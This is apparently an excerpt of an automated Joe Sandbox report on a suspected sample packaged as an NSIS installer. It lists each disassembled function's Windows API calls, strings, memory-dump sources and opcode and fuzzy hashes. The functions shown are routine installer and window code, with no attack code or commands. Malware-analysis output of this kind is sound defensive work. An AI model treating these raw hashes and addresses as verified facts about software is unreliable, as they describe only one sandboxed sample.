                                                                                                                  • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                  • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                                  • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                  • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                                  • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                  • String ID: f
                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                  • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                  • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                  • wsprintfW.USER32 ref: 004067A4
                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                                                  • API String ID: 2200240437-1946221925
                                                                                                                  • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                  • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                                  • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                  • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798
                                                                                                                  APIs
                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                  • wsprintfW.USER32 ref: 00402E45
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                  • API String ID: 1451636040-1158693248
                                                                                                                  • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                  • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                                  • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                  • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                                  APIs
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2667972263-0
                                                                                                                  • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                                  • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                                  • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                                  • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                  • wsprintfW.USER32 ref: 00404CB6
                                                                                                                  • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                  • String ID: %u.%u%s%s$(7B
                                                                                                                  • API String ID: 3540041739-1320723960
                                                                                                                  • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                                  • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                                  • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                                  • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                                  APIs
                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                  • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                  • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                  • String ID: *?|<>/":
                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                  • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                  • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                                  • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                  • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                                  APIs
                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1941528284-0
                                                                                                                  • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                                  • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                                  • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                                  • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                  • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3808545654-0
                                                                                                                  • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                                  • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                                  • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                                  • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1849352358-0
                                                                                                                  • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                                  • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                                  • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                                  • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                                  APIs
                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                  • String ID: !
                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                  • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                  • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                                  • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                  • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                                  APIs
                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$Enum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 464197530-0
                                                                                                                  • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                  • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                                  • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                  • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                                  APIs
                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                                  • GetLastError.KERNEL32 ref: 00405976
                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                  • GetLastError.KERNEL32 ref: 00405995
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3449924974-0
                                                                                                                  • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                  • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                                  • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                  • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,76232EE0,00405B1A,?,00437800,76232EE0,00000000), ref: 00405D76
                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                  • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,76232EE0,00405B1A,?,00437800,76232EE0,00000000), ref: 00405E1E
                                                                                                                  • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76232EE0,00405B1A,?,00437800,76232EE0), ref: 00405E2E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                  • String ID: 0_B
                                                                                                                  • API String ID: 3248276644-2128305573
                                                                                                                  • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                  • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                                  • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                  • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                                  APIs
                                                                                                                  • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                    • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                  • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                  • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                                  • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                  • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                  • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,76233420,004036EF), ref: 00405F46
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                  • String ID: nsa
                                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                                  • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                  • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                                  • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                  • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                                  APIs
